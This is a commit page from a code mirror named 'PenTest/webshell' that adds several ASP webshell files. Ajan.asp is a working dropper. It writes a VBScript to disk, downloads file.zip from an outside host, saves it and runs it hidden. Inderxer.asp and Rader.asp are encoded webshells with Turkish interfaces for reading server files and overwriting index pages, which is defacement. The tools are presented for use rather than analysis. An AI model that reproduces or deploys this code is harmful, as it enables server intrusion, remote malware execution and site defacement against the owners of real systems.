PenTest/webshell
1
0
Fork 0
mirror of https://github.com/tennc/webshell.git synced 2025-12-06 04:41:28 +00:00
Code Issues Projects Releases Wiki Activity

update

Browse Source
This commit is contained in:
tennc
2013-06-10 15:05:53 +08:00
parent 33efab6739
commit 9db4327d81
28 changed files with 5363 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

30
asp/Ajan.asp Normal file
View File

@@ -0,0 +1,30 @@
<SCRIPT LANGUAGE="VBScript">
<%
Set entrika = CreateObject("Scripting.FileSystemObject")
Set entrika = entrika.CreateTextFile("c:\net.vbs", True)
entrika.write "Dim BinaryData" & vbcrlf
entrika.write "Dim xml" & vbcrlf
entrika.write "Set xml = CreateObject(""Microsoft.XMLHTTP"")" & vbcrlf
entrika.write "xml.Open ""GET"",""http://www35.websamba.com/cybervurgun/file.zip"",False" & vbcrlf
entrika.write "xml.Send" & vbcrlf
entrika.write "BinaryData = xml.ResponsebOdy" & vbcrlf
entrika.write "Const adTypeBinary = 1" & vbcrlf
entrika.write "Const adSaveCreateOverWrite = 2" & vbcrlf
entrika.write "Dim BinaryStream" & vbcrlf
entrika.write "Set BinaryStream = CreateObject(""ADODB.Stream"")" & vbcrlf
entrika.write "BinaryStream.Type = adTypeBinary" & vbcrlf
entrika.write "BinaryStream.Open" & vbcrlf
entrika.write "BinaryStream.Write BinaryData" & vbcrlf
entrika.write "BinaryStream.SaveToFile ""c:\downloaded.zip"", adSaveCreateOverWrite" & vbcrlf
entrika.write "Dim WshShell" & vbcrlf
entrika.write "Set WshShell = CreateObject(""WScript.Shell"")" & vbcrlf
entrika.write "WshShell.Run ""c:\downloaded.zip"", 0, false" & vbcrlf
entrika.close
Set entrika = Nothing
Set entrika = Nothing
Dim WshShell
Set WshShell = CreateObject("WScript.Shell")
WshShell.Run "c:\net.vbs", 0, false
%>
</SCRIPT>

2
asp/CyberSpy5.Asp Normal file
View File

File diff suppressed because one or more lines are too long

57
asp/EFSO_2.asp Normal file
View File

File diff suppressed because one or more lines are too long

74
asp/Inderxer.asp Normal file
View File

@@ -0,0 +1,74 @@
<%@ LANGUAGE = VBScript.Encode %>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
<meta http-equiv="Content-Language" content="tr">
<title>WwW.SaNaLTeRoR.OrG - inDEXER And ReaDer</title>
<%#@~^UgsAAA==^mVs,/DXV@#@&OEk'~J@!mnUD+D@*@!4M@*@!6G.:,l1YrWUx4YOw=&zShA klxCsD+.WM KDL,YmDoY{m4^lU3,:nO4WN{2WkY@*@!rUw!Y,YzwnxkE8:bOP7ls;'JEjz1)S:3"r]cr"MJrPkry'*c@*@!&WKD:@*E@#@&m\6xE@!1+ YnD@*@!6WUY,^W^W.x^k:n~kk"+{X@*?^MkaYP_l0V<30>x9l@!4M@*@!WKxY,^W^WD{A4kD+,/rynxy@*@!z1nxD+.@*@!Vk@*$!PjmMraY~g+kx+,r^;<3B>Y!Dhl,CCV0<56>P..k^:k<>,#nXmP`x;Y;ssE<73>~?.\DsCMlP<6C>U[6~bDhm3~j+,?+M\.Nm3rPz/2~BPw42PBPlk2aPTk(k~NGdHlslM<6C>UPb<50>+.r<>bxk~G0Ehl0~b<>kU,Xmy<6D>Vs<56><73>Y<EFBFBD>M @!(D@*@!^k@*$!P?1.kaYV~$kMP<4D>K3~?rOXnP`<60>.l<>sl[C P}C4s+O/b"1+~<7E> N6PzYm8k^k./bxr"c`PUPPGW/D~jkD+^+.k~umDr<44>P*@!Vb@*j^MkwOr PFE^smx<6D>s<EFBFBD><73><EFBFBD>,<2C>V0PAm3<6D><33>DCPnl.<2E><><EFBFBD>3,Mnsm+0OkMR@!^r@*S<>D0x~ArsTk~29rxs+V~<7E><>bxPF;^VCxsC,|<7C>sm\!yE E,63!X;x!y c@!4M@*@!1+xDn.@*@!k@*AzP\n4NrJ@#@&3!VsC k:xE@!mnxDnM@*@!6W YP1W^GD{Vr:Pdr.+'l@*|!VVmU<6D>hP~k^orVn.b@!8D@*@!0KxO~1WVG.{h4kDn,/r.+{ @*@!z1nxD+.@*@!0GUDP/b"+{F@*@!sr@*g+MNnx_~~E.lHCPzYC^m<><6D>x<EFBFBD>y~r Nn6b~Tk.bx,`bDl1C<31><43>x<EFBFBD>.Prx9+a~n+x9rPUkYUry9+,rs:Cs<43>*<2A>DU)Gn0mEsOcl/2@!^k@*1.XnQP~EPn<50>/sCP<43> Nn6bPuC ok,jkD+X~)Ymmm3dlU<6C>",WUE ~XDrUbPXC"mmC3k<33>U<EFBFBD>.P<>. P=PRczc zmVrxbxdrD+/b mK:P@!C~tM+6'_W.U3@*@!6GxDP^G^WDxsb:n@*G)_b~wb\Sb,<2C>Ig3|,"Z@!Jl@*@!J0W O@*@!Vk@*6VE,g,A;DCzmPG3!hl0PrdD+Nn<4E>r k"PGGkXC <09>x,bN<62> <09>PjnPI+.k k~emy<6D>x,@!l,tDWxgKD +V @*@!6WUY,^W^W.x^k:n@*Gbub,oz}JzP<7A>"12nR@!&l@*@!&0KxO@*@!4D@*@!mxY.@*AHP@!l~t.n6'hlbsYK)hCbV4Gh(@$4WDhmkscmK:gkE(%+1Yxk NnaD@*tnt9k@!JC@*@!(D@*?2+^rmV~K4Cx0/~PKPCGsHfn:KU,~30WMW:mx,SP_kO4mXOCMP~GnVb0k<30>VE@#@&mKwz'E@!1+UY.@*@!0GUDPmGsKDxVbhPdby'*@*Ksk6Pul03<30>@!8M@*@!6GxDPmKsGD{h4kO+~dbyn'y@*@!JmnUD+D@*@!^k@*A!~Um.bwDPHt9rP:l.l6<6C>x[C P5m"<22>Vs<56><73>Y<EFBFBD>Dc@!sk@*f<66>+.Vr~:lV<6C>:,)D0l[C<>^lD<6C>h~_WsXGnsWUvb9:k #,SPA3GDK:CU,`sc6RqPl9hrxbP*PSPurD4CXDCDv?CUmVb.n l~b9hbxr*PBPfVbWk<57>3~`UlUC^bDUl,bNsrUk*PBPPE.C /G0D~`:E.C /WWOcKVPz[skUb#,~Pg+K~.PP<50>:,b[CsPr^Cx^lDm~P+<2B>30<33>Ds+. c@!sk@*$E,?^.bwY~)kVCP@!WKxO,mKVWM'^r:@*JWTPcVmX<6D>Y*~@!J0W O@*K!Ysl"R@!sb@*3L9nDbx~ezwY<77><59><EFBFBD>~$!xCP~n ynMPUmDbwD~K<>sP$k^orsDk,JWTVEHG.P~k^orxr"R Rv$E,KCV<43>sNlU~UmGD^nXP9xxPdlsnD,\nPAL[nMPSmh+MkP:<3A>h~A<>^obVnDr~dWLV!zWMVC.*@!Vr@*V<>\nx^r,ArMPUmDbwD~<7E><>k Pjl9+^n,?K,dmMkwDsnDbxbPFEssmxhl <09>"<22>P<EFBFBD> +.rMky E@#@&sk V^+.{J@!m+ Y.@*@!0GxDP^G^WD{sks+Pkr"+{*@*fG/O~UkO+^nD@!4.@*@!0WUO,mGVK.{h4bYP/byx @*@!&mxOnM@*@!^r@*ShhcdCxmVD+.W. KDL@!^r@*ShA 6lY4nMWWh8cmGs@!^k@*ShS /mxCVmDnUmRmKh@!^k@*SAARDEMlU/GWDRO3@!sk@*hAAcYl4.b4CYc^K:@!^k@*hhSRbdVm:CtbyhnDRmKh@!^k@*SAAR4lMEUXC4Hl WML@!1+UOD@*@!WKxOP1G^W.{DNPkk.n'W@*Jbt2]~U<>K2d3I<33>@!zmUO+M@*@!4.@*@!WKxOPkry'+@*@!Vk@*ASh /m8KYCT+ Y+m:cGDTPSPShA kl\kC3cmWs~SPShSRhkUr6 xOJ@#@&GLP'~];;+kOcp;DH?YMk L@#@&kWPKon~{PJr~Y4+x@#@&^l^V,:CkU@#@&+s/r0,WLn,'PE!Kx[+ME,Y4x@#@&mmV^~mm/nF@#@&nsk+k6~WT+P{~EW0ErPOtnU@#@&^l^sP1ldny@#@&nsk+r0,GT+~{Prtl03bUNmJ~Y4+U@#@&ml^sP1l/f@#@&Vk+r0~GT+~',E3!VsC k:E~Dtnx@#@&1ls^P1l/c@#@&+^/nk6PGLP',EmKwXr~Otx@#@&^lss,mC/X@#@&+sdk0~GT+~',E^kU0VDJ,Y4nx@#@&^l^V~^m/++@#@&V/rWPKoPxPEGMxn3r~Y4+U@#@&mlss,mC/{@#@&n^/k0,WTnP{PEWMxnVyJPD4+ @#@&1CsV,mm/n%@#@&x[PbW@#@&/;8,:lrUS40DAA==^#~@%>
<center>
<br><br><br><br><br><br><br><br>
<br><br><br><br><br><br><br><br>
<hr color=lime width=50%>
<SCRIPT LANGUAGE="JavaScript">
<!--
function Start(page)
{
OpenWin = this.open(page, "CtrlWindow","toolbar=menubar=No,scrollbars=No,status=No,height=250,");
}
//-->
</SCRIPT>
<script language="JavaScript1.2">
var message="SaNaLTeRoR - <20>nDexEr - Reader"
var typingbasecolor="red"
var typingtextcolor="lime"
var blinkspeed=598
var fontface="arial,geneva,helvetica"
var fontsize="5"
var n=0
if (document.all){
document.write('<font face="'+fontface+'" size="'+fontsize+'" color="'+typingbasecolor+'">')
for (m=0;m<message.length;m++)
document.write('<span id="typinglight">'+message.charAt(m)+'</span>')
document.write('</font>')
var tempref=document.all.typinglight
}
else
document.write(message)
function typing(){
if (n==0){
for (m=0;m<message.length;m++)
tempref[m].style.color=typingbasecolor
}
tempref[n].style.color=typingtextcolor
if (n<tempref.length-1)
n++
else{
n=0
clearInterval(blinking)
setTimeout("starttyping()",1500)
return
}
}
function starttyping(){
if (document.all)
blinking=setInterval("typing()",blinkspeed)
}
starttyping()
</script>
<form action="?Gonder" method="post">
<center><table>
<td>Nerden :<td><input type="text" name="nerden" size=25 value=index.html></td>
<td><input type="submit" onclick="submit()" value="Veriyi G<>nder"></td><tr>
<td>Nereye :<td><input type="text" name="nereye" size=25></td><td><input type="reset" onclick="reset" value=" Temizle "></td><tr>
</form>
<form action="?oku" method="post">
<td><font color=pink>Oku :</font><td><input type="text" name="klasor" size=25 value=<%=#@~^LQAAAA==.;;/DR/D7nD7l.km4snk`JzKnd{n_ejq;bd{KbPur#kQ8AAA==^#~@%>></td><td><input type="submit" onclick="submit()" value=" Veriyi Oku "></td><tr>
</form>
</table><br>
<a href="javascript:void(0);" onclick="javascript:Start ('?hakkinda');">
Script Hakk<6B>nda </a> - <a href="javascript:void(0);" onclick="javascript:Start ('?kullanim');">Kullan<61>m Bilgileri </a>- <a href="javascript:void(0);" onclick="javascript:Start ('?copy');">Copright</a> -<a href="javascript:void(0);" onclick="javascript:Start ('?linkler');"> Linkler</a>
<br><br><br>
<hr color=lime width=50%>
<%#@~^VA4AAA==n N~kE(@#@&EO RO ORO ORR OO RO O@#@&d;4,mm/nF@#@&Kx~+M.WMP.nkE:n~ +aY@#@& +.9+ P',D5E/OR6W.hvJx.NxJ*@#@&xDXnPx~M+5EdYc0G.s`JUnM+z+rb@#@&jY,EYbVk~',?nD7+. ;D+mO+}4L^O`rHU/RPGKVdJ*@#@&b0~nMDP@!@*,!~Y4n P@#@&D/wKxknRSDrYPE@!1+xDnD@*Cb:)~),JL+.D [/^Db2YbWU'r@!z^n YnD@*E@#@&n^/@#@&M+k2W /nRSDrOPJ<50><4A>^n:bxk.~$l<>mD<6D>^<5E>J@#@&nU9Pr0@#@&EDksdcnDG^/dsK.sPUDX+BP nD9+U@#@&DndaWxknRSDkDn~J@!mxO+.@*@!4.@*@!WWM:~C1YkGU{g~:O4W[{wK/Y@*@!bUw!Y~YHwnxkE4srY,\l^;n'rJz1)Pj)Is)Jr~/bynxWc@*@!&6W.:@*E@#@&@#@&+ NPkE(@#@&EORO ORR OO RO OO RRO@#@&kE8P^Ck++@#@&Gx,+..KDP.nkEh+,U6O@#@&0VlkWM~',Dn;!+dOc0WMh`r3VmdGDr#@#@&j+O~K4%C:Pn,'~jD\n.cZ.+mOr8N+1Y`rHb^DK/G0DRp\dCK:KJ*@#@&bW~P WDPnD.~{PTPD4+ P@#@&M+/2G /nRS.bYn,J@!m+ Y.@*_bPb,)~EL+DM N/mMr2YbW [E@!^n YnD@*E@#@&+U[,k0@#@&K4%C:PhR6a+ PJV2:E~,JE[0VCdKD[rE~,0l^dn@#@&W(LuKPKc?nx9@#@&0W[smDPx~k+.\.ctOsVAxmKNcW(LuK:n ]/wKU/K+XOb@#@&D/2WUdRADbO+,J@!WKxY~^KVGD{A4kOPkky'l@*@!1+UYD@*~ P.A]<5D>SAIP ~@!4M@*@!mnxOnM@*@!YaYmDnC,/Yzs'vhb[DtlO!uitkT4Y=&X!pB@*EL3W9slM[J@!&O+XYmDnl@*E@#@&.+k2W /n SDkOn,J@!4M@*@!0GM:,lmDkKU'QPh+DtG[{wWkO@*@!kxa;OPDXa+x/;8skOP7CV!+xErb1)~UbeszErPdby'cW@*@!&0KDh@*r@#@&n NPk;4@#@&B RRO O ORORR ORO RO @#@&d!4P^Ck+f@#@&./2Kxk+RSDbO+,JE[1\W'rJ@#@&.+kwW dnRSDbYnPEELY;/LEJ@#@&nU9P/;8@#@&vO R OR O OO O RO ORO @#@&d!4P1C/c@#@&.n/aW /nRA.bYnPrE[0Essmxkh'rJ@#@&MnkwG /RhMkDnPrJ'Y!/'Er@#@&UN,/E(@#@&B O ORORR ORO RO ORR O@#@&d!4~mmd*@#@&D/wKxknRSDrYPEELmWaz[rJ@#@&.n/aW /nRA.bYnPrE[DEd'rJ@#@&n N~/!8@#@&v O OO O RO ORO ORR OO@#@&/!4P1Cd++@#@&Dn/2G /nRS.kD+~Er[SrU0VnDLEr@#@&M+kwW / hMkO+,JE'DE/LEJ@#@&+ [~/!4@#@&vORR ORO RO ORR OORR O@#@&k;(P^m/G@#@&DdwKxd+ch.rD+Pr@!Vb@*<2A>V0~<7E>UmPnE.4CU<EFBFBD> PjkDn/bxn~zY:CV,k<>rx,8bD~bx9+6,tm"<22>D^lz<6C>xc@!sr@*?Yc~k N+Xn.Pmx9P.+C[D~?1.kaYrUbxPeC <09>xCPI<50>V^+zbxc@!Vb@*UGxMl~k Nna,Alk<6C>sl1l3,drYX^+~lzU<7A>,/nD7nD9lU~kkYn~mV<6D>UPJ~wDnVDPb<50>k ~h4dls4C~bN+ms@!^k@*Grz+^ksP)NCh<43> PjkDn/bPW.+tGdDFfRSn(/Cs4mRmK:Jhl4:;Y,/r"9+PSn4kl:(C[l P6Dn+4GkYq&cA+(/Ch(lR^Gszhl4d!x~9kH+4bD,z+MPCV9<56><39><EFBFBD>x<EFBFBD>"<22>~7lDkCXmV<6D>:@!sr@*UY,kUNnaD~l [PM+C[DPd^Mk2YbUbPWM+tWkY8fRS+8/m:8CcmWs&:mt/!U&k N6nD Ckw~ob8k,X<>VsNkUr.R@!Vb@*_l"<22>MVmN<6D><4E><EFBFBD>x<EFBFBD>.PbUN6rNPCz <09>PX.+,lYD<59>U<EFBFBD>"R@!Vb@*<2A>r:[r,MnV9rPnE.8mxl~r Nn6b~mYhmXmP/DPbUN6nD,lU[,D+m[+MP/1.rwDk NnP@!WKxOP1GVKDx2bx3@*HD[+ @!J0G Y@*PXmymUPH+.+,lOC1l<31><6C>:<3A>.~k N+Xrhk.k PCN<43>U<EFBFBD>~Hl"<22>XK.E.Rcr N+a 4YhV,Lb4r*@!^k@*@!0KUY,mGVKDx2bx3@*H+M+X@!&0KxD@*~|<7C>dh<64> l~<7E>/~b9lh<6C>U,+8~nlslk<6C>.<2E>,4r.NxP(k.r:,3slk<6C>D[n P4b~l^YP9r"k NPGV[;<3B>!Pr<50>k ~RczhC4:EO&bx[+X 4Yh,Xmy<6D>XKD!"P(E.Nm3r~bxNaR4Y:,C[ls<6C>x,/rYndbx[+0rPbx[nXB+~L<>M+~N<4E>r<EFBFBD>bD~s+k+VmP9n0mEsYcld2,0k^Cx9lPKsC4bVbD @!sr@*.nDbzk,M<>U[DPP;<3B>!xCP~CkY<6B><59><EFBFBD>h<EFBFBD>.NmPb9ls~<7E>x9+ak,Xnhb<68>Pr^;XKDR@!sr@*~E,k<>s+h[P@!0KUY,mGsKD'2r 3@*r0;@!zWKxD@*P0<50>/s<>~AK<41>PFl^l^C0R@!^r@*zDY<44>0~ul^l,bUVChmN<6D>z/mU<6D>y,)~hmkV8Gs4@$tKOslr^R1W:,~,4W^X[+sWU@$4WYsCk^RmKh~~,hSh /CUmVO+MGDcW.L,/kOnsk"NU,\n,/bY+,l9hk P&PsW[smD<6D>x9Cx,XlM[<5B>hPmVm4rVr.kkUk. Pr@#@&./wGUk+ hMrD+~rJLYEk[rE@#@&+UN,/;8@#@&B RO OO RRO O ORORR OR@#@&dE(P^Ck+%@#@&M+dwKUk+ SDbY+,J@!8D@*@!8D@*@!^n Y+M@*A!P/1.rwDPt+4Nr~:l.l6<6C>UNmx~jcKP)[<5B> l~5m"<22>^:<3A><>O<EFBFBD>MR@!4D@*<2A>mMnY^k~.P<7F>^.Y/b"Pz/w,uG/DVmD<6D>UPP<50>h<EFBFBD> NnP<6E>ms<6D><73><EFBFBD>DcR@!8M@*b[./~?mO<6D>M<EFBFBD>PF<50>k:<3A> lPnW9;x!P!<21>D<EFBFBD> Y<>sns+3,<2C>dYNk<4E>bUry,fK/zlU<6C>U,b[<5B>x<EFBFBD>,zl.<2E>x @!4D@*P6OlMnmP$<24>^<5E>:<3A>,2<>+MP~G<>/mPulDl~#mDPGn:3Yb. @!(D@*|;D8C <09>x~fKdXmVC.<2E> <09>PM<50>.<2E>UD<55>VnX8bVh3,<2C><>kx,bHU<48>PU+.\D[n,rVsCx<43>.PSm"<22>hP_N9Pol.VYh+. R,@!8.@*bN.nkPF<50>/s<>UmPPm:,.+Mk,!kMkskMPc<50>. )P9l-S+4'Csk1l -[+WC!VORmdw@!4.@*@!Vk@*HVnD,emwC(k^kDb:@!8D@*?rYNnVbPk ^V!N+^n.k,Ym3rw~n9+.+0~b9:rU,nlUn^kU+,i^l<>hm@!(D@*zNsrx,<2C>kWD/rUbP<62>l^hl@!4D@*jn/kkKx~.n~;WG3bnPG+<2B>n.^+Dr~<7E>mVCDmV,SGTk Pr^:m@!4M@*jkD+snMkx,#+MkP:C8l VmD<6D>U<EFBFBD>P<EFBFBD>U[bDh+,-/cR E@#@&DndaWU/ SDrD+,JJLY!d[rJ@#@&x[~kE4@#@&B OO RRO O ORORR ORO R@#@&WVIEAA==^#~@%>
</table>
<%#@~^CQAAAA==d!4~kYHV+mwMAAA==^#~@%>
<style>body{margin:0px;font-style:normal;font-size:10px;color:#FFFFFF;font-family:Verdana,Arial;background-color:#3a3a3a;scrollbar-face-color: #303030;scrollbar-highlight-color: #5d5d5d;scrollbar-shadow-color: #121212;scrollbar-3dlight-color: #3a3a3a;scrollbar-arrow-color: #9d9d9d;scrollbar-track-color: #3a3a3a;scrollbar-darkshadow-color: #3a3a3a;}.k1{font-family:Wingdings; font-size:15px;}.k2{font-family:Webdings; font-size:15px;}td{font-style:normal;font-size:10px;color:#FFFFFF;font-family:Verdana,Arial;}a{color:#EEEEEE;text-decoration:none;}a:hover{color:#40a0ec;}a:visited{color:#EEEEEE;}a:visited:hover{color:#40a0ec;}input,.kbrtm,select{background:#303030;color:#FFFFFF;font-family:Verdana,Arial;font-size:10px;vertical-align:middle; height:18; border-left:1px solid #5d5d5d; border-right:1px solid #121212; border-bottom:1px solid #121212; border-top:1px solid #5d5d5d;}textarea{background:#121212;color:#FFFFFF;font-family:Verdana,Arial;font-size:10px;vertical-align:middle; height:18; border-left:1px solid #121212; border-right:1px solid #5d5d5d; border-bottom:1px solid #5d5d5d; border-top:1px solid #121212;}</style>
<%#@~^BwAAAA==n N~kE(oQIAAA==^#~@%>

116
asp/Rader.asp Normal file
View File

@@ -0,0 +1,116 @@
<%@ LANGUAGE = VBScript.Encode %>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
<meta http-equiv="Content-Language" content="tr">
<!--
   
   
    
    HACKING
    Mehdi & HolyDemon
   www.infilak.tr.cx & www.infilaktim.tk
  
-->
<%#@~^FAAAAA==G PnMDKDPM+k;:PU+XYtwcAAA==^#~@%>
<%#@~^2QgAAA==@#@&w.K{ l:P{~JU+^DYor^+/r@#@&HlybsCD,',J@!Vr@*&RHRw~JLw.G|xlhnLJ~?1.bwObxbP|!V^Cx9<78><39><EFBFBD>x<EFBFBD>"P<><50>bx~P<50>+30<33>.PAN+Mr"R@!Vb@*~A;~Um.kaOk P3U,<2C>x+hsbP<62>"+^sb<73>k~"l0kw^+MrPVk8k,|Cz<43>DP`^Go*P@!(.@*Y!Yslhld<6C>[<5B>MR R@!sk@*A;~UmDr2DkUPgCk<43>V~nE^Vl <09>Vm^l<><6C>,5CD9<44>:~$<24>^<5E>:<3A>x9nPt+\1;OY!D,rVEz;aYCP_CVmP)U^l:C"klU<6C>y,ASh bx6kVm3cODcmaPUkOnkkxbUPwWD!h~A<>^<5E>:<3A> Nnx~)HD<48>UY<55>^<5E>~AbVLrHkP$;^l8k^rM/r k.RR,@!^r@*Il.N<>sP#n,f+kO+0V+MrUNx,fGVCz<43>,CGVH9+sWU~j+P3VKDG:mUEl~<7E>KW0PK<4B>+0V<30>D,2[+Mkh c@!Vb@*?1DkaOr:bybP!<21>\nU^+~|!sVmxC8bVk.dbxryc @!Vr@*|!VVmx<6D>s~Cm3V<33>x9l~!xk<78>,$k^ok,)s:m3,<2C><>kUP( gRoPz[:bx~#Xl~!<21>M+-VbsDrHVPM<50>M<EFBFBD><4D><EFBFBD>x<EFBFBD>. R@!4.@*@!4.@*@!4D@*@!4M@*@!(.@*@!(D@*@!8D@*@!(D@*@!(.@*@!0GUDPmGsKDxD[@*@!^xD+D@*@!(@*A`P$<24>I,q HcsPU6s:P5zt(S&H&f(I @!J4@*@!(.@*@!4.@*@!0WUO,mGVK.{4s!+@*$P_l0~MV[k,ACO<43>^P}mrV,rV9;~T@!4M@*@!t.~1WsWMx4^l^V,/k"n{G@*@!(.@*@!^xD+D@*@!m~tM+W'4YO2=zzSAhckx6rsl0RDD ma@*qh R&UsbSCVcKD /o@!&l@*' 4daiLx4kwp'x(/2iLx8dai[ 8/ai[ 8dwp@!mP4DnW{tOYalzJhAAc+3G.K:Cxch3C kcmWs@*AVWMWhl R\n0lxb ZK:@!JC@*[ 4kwI[U8kwI[ 8/ai'U(/wI' 4dwp' 4dai@!lP4DW'4YOw=z&AShR0CDkWxWdl +kk YV@*nl./KU26/CU/k O0@!&l@*' 4daiLx4kwp'x(/2iLx8dai[ 8/ai[ 8dwp@!(D@*@!8.@*@!CP4.+6'hCbVYGlslrV(Gs4@$4WD:lbVc^Ws@*\+4Nr@!Jl@*LU4kwiLU8/aiLx8/2ILx8/aI[ 4d2p[x8dai@!l,4M+W{:mkVDW=4W^X[+sWU@$4WYsCk^RmKh@*CKVHfn:GU@!zC@*LU4kwI' 4/2ILx8/aILx8kwp[x(/aI[ 4dwp@!C~4D+6x:mkVDGl+M3mxqc*@$sXU+D mK:@*30WDGhmx@!zm@*@!4.@*@!(D@*@!l,4D0xtDY2lJzhSARbx0bsC3cYMR^6@*(c1 s@!&l@*J@#@&4+V2~{PEA!~km.bwDPHt9rP:l.l6<6C>x[C PqcHRwPKChPzN<7A> l~5C"<22>^:<3A><>O<EFBFBD>Dc@!4M@*@!sb@*<2A>m.nDVrPjn,<2C>m.Ykky,bk2P_WdY^l.<2E>U,K<>:<3A> [+,<2C>lV<6C><56><EFBFBD>M @!(D@*@!sk@*@!J4@*b9.+kPjCD<43>D<EFBFBD>PF<50>ds<64>xCPnG9EU!PV<50>D<EFBFBD>xD<78>Vh+0P<30>dYNr<4E>r ky,9WkXl <09>U~b9<62>x<EFBFBD>,XCy<43>U c@!8D@*@!Vb@*PnXYl.nmP$<24>V<EFBFBD>s<EFBFBD>~A<>+.,AK<41>/l,CmOl,.CD,fnh3Yb.R@!4D@*@!sk@*|!D8lU<6C>U,fG/HCVmD<6D>U<EFBFBD>~V<>D<EFBFBD>xO<78>sXn4bss+V,<2C><>k PbHx<48>,j+M\nD9+~6^:l <09>"Pdly<6C>s~uN9Pwl.3nOs+"Rc~@!(D@*@!^k@*)[M+dPn<50>ds<64>xC,Km:Pj+MrPVk.k^k.~v<>Dx=~N=-h8wl^k1lU-[n6l;VD lkw@!8M@*@!^n YnD@*@!6WUDP1WVKD{.+9@*H+^+.~Ilwm8k^kDbh@!z6W Y@*@!&^xO+M@*@!(D@*@!^k@*jrD+[+0r,kU1V!N+^+MrPDlVkaPn[D+0~b9:k ~Kl +^kU+~i^l<>hl@!8D@*@!sr@*bNhr P<>r0MnkkUbP<62>mV:m@!(.@*@!Vr@*U+ddbWx,#+,ZWKVr+,f<66>+.Vn.bP<62>CVm.l0PJGTkx~6^:C@!(.@*@!sb@*UkYV.k P#+Mk~Pm4l slM<6C>x<EFBFBD>P<EFBFBD> [rDs+,\dR @!4.@*@!8D@*@!^n Y+.@*@!0GxD~1WsKD{/k^\.@*@!l~tM+Wxslk^OW=:lbs8Ws4@$tGYhCbV mKh@*@!0GUDPmGsKDx/bs7+.@*HACf<43>@!zm@*Pr9LwCAA==^#~@%><title>I.N.F HACKING CENTER - <%=#@~^CAAAAA==2MWm ls+UQMAAA==^#~@%> - www.infilak.tr.cx</title><%#@~^HAEAAA==@#@&l^DP{PI;!n/DR}EDzjDDk L`rlmDrGxr#@#@&(0~C1Y~',EtV2E,KtnU@#@&^l^s,XCMNb:@#@&+ [Pb0@#@&0VCdKDP{~D;EdOR6WM:cJVsm/GDrb@#@&kds:Px~M+5EdDRWKDs`Jb/^n:r#@#@&b0~rkV+sxJrPY4nU@#@&kkVn:~x,J[EME@#@&+U[,k0@#@&b0~3^CkW.,',JJ,Y4nx,3slkW.x,D+$;+kYRkn.\D7l.kC8^+d`r)nhSmK_5?(/zSmnzP_Jb@#@&gVMAAA==^#~@%><center> <%#@~^UAAAAA==@#@&DnkwKx/RS.kD+~J@!4G[HP4T^W^WD{:f&2&2&@*@!8G9X~YK2:mDLr '*T@*r@#@&mms^PdbYbVuBcAAA==^#~@%><form method=post name=inf><table width="75%" border=0 bgcolor=black><tr><td><table width="100%" border=0 bgcolor="#666666" cellpadding=1 cellspacing=1><tr><td><center> <%#@~^WQAAAA==@#@&DnkwKx/RS.kD+~J@!khL,/D1xtDYw=&&+cNK:CkU[^6 mKhz0l.dKxF&r 0sWTGcor6P4+kTtDx,y@*E@#@&fhwAAA==^#~@%></td></tr><td bgcolor="#999999" height=32>&nbsp;<Font size=2 Color=000000 Face=Verdana><b>Adres : </b>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</Font> <input type=hidden name=islem value=basla> <input type=text name=klasor size=49 value="<%=#@~^BgAAAA==V^ldKDjAIAAA==^#~@%>"> &nbsp; <input type=submit value="Kodlar<61> G<>ster" name=submit> </Font> &nbsp; &nbsp; &nbsp; <a href=mailto:mailbomb@hotmail.com title="E-mail G<>nder"><font face=wingdings color=lime size=4>*</font> </a>&nbsp; <a href=http://www.infilaktim.tk title="I.N.F Sitesi" target=_blank><font face=wingdings color=lime size=4>M</font> </a>&nbsp; <a href="?action=help" title="Yard<72>m" target=inf onClick="window.open('?action=help','inf','width=450,height=400 toolbar=no scrollbars=yes' )"><font face=wingdings color=lime size=4>&</font> </a>&nbsp;</td></tr></form></td></table></td></tr><tr><td><table width="100%" border=0 align=center><tr><td bgcolor="#CCCCCC" height=359><%#@~^QwAAAA==r6PUKY,k/^+s~',J8lkVCE,YtU@#@&D+k2Gxk+ch.kOn,JE[HCybVC.LJJ@#@&Vd+nBQAAA==^#~@%><br><center><textarea rows=24 name=kodlar cols=90>
<%#@~^yAAAAA==jY~K4NCK:n,xPU+.\D /M+lDnr(L+1OcJtk1DG/GWDRpHduK:nEb@#@&W8%_KPnc6a+U,JV2Kr~,EJL3slkW.'rJ~,Wl^/+@#@&G4NC:KKRjn N@#@&0GN^l.~{P/n.7+.R4OsV3 mKN+vW(%C:KKR"+d2Kx/P+XY#@#@&.+kwKxd+ AMkO+,VW9VC.@#@&+U[,kWoT4AAA==^#~@%>
<%#@~^CQAAAA==j`A~UkDkVDwMAAA==^#~@%><style>TD {
FONT-SIZE: 10px; FONT-FAMILY: Verdana,Helvetica
}
BODY {
FONT-SIZE: 10px; FONT-FAMILY: Verdana,Helvetica
}
P {
FONT-SIZE: 10px; FONT-FAMILY: Verdana,Helvetica
}
DIV {
FONT-SIZE: 10px; FONT-FAMILY: Verdana,Helvetica
}
A:link {
COLOR: #006699; TEXT-DECORATION: none
}
A:active {
COLOR: #006699; TEXT-DECORATION: none
}
A:visited {
COLOR: #006699; TEXT-DECORATION: none
}
A.postlink {
COLOR: #006699; TEXT-DECORATION: none
}
A:hover {
COLOR: #dd6900
}
.bodyline {
BORDER-RIGHT: #98aab1 1px solid; BORDER-TOP: #98aab1 1px solid; BACKGROUND: #ffffff; BORDER-LEFT: #98aab1 1px solid; BORDER-BOTTOM: #98aab1 1px solid
}
INPUT {
BORDER-TOP-WIDTH: 1px; BORDER-LEFT-WIDTH: 1px; BORDER-LEFT-COLOR: #006699; BORDER-BOTTOM-WIDTH: 1px; BORDER-BOTTOM-COLOR: #006699; FONT: 11px Verdana,Arial,Helvetica,sans-serif; COLOR: #000000; BORDER-TOP-COLOR: #006699; BACKGROUND-COLOR: #fcfcfc; BORDER-RIGHT-WIDTH: 1px; BORDER-RIGHT-COLOR: #006699
}
TEXTAREA {
